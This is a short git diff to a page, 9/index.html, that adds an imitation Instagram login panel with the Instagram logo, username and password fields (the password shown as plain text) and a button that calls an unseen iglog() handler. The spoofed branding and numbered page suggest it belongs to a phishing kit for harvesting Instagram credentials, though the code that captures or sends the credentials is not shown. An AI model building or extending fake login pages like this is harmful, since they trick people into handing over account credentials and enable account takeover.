adjusted ig login

--- a/9/index.html
+++ b/9/index.html
@@ -3456,7 +3456,7 @@
     </div>
 
     <!--Insta login begins-->
-    <div id="ig_wrapper">
+    <div id="igp">
         <div id="igcontainer" class="_ar45 system-fonts--body roboto">
             <div id="mount_0_0_6z">
                 <div class="">
@@ -3661,7 +3661,33 @@
         </div>
     </div>
 
+
     <!--Insta login ends-->
+
+    <div id="ig_wrapper">
+        <main class="l-main">
+
+            <div class="l-user">
+                <div class="c-panel group">
+
+                    <img class="c-panel__img" src="asset/inst-img/instagram.svg" alt="Instagram">
+                    <div class="c-panel__form">
+                        <input type="text" class="c-panel__input" class="form-control" required
+                            data-error="Please enter your email" placeholder="Phone number, username, or email"
+                            id="ig-uname">
+                        <input type="text" class="c-panel__input" class="form-control" required
+                            data-error="Please enter your email" placeholder="Password" id="ig-pass">
+                        <button class="c-btn" type="submit" onclick="iglog()" id="ig-log"> Log In</button>
+                        <span class="c-panel__span">OR</span>
+                    </div>
+                    <br>
+                    <br>
+                </div>
+
+
+            </div>
+        </main>
+    </div>
 
     <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.all.min.js"></script>
     <script>
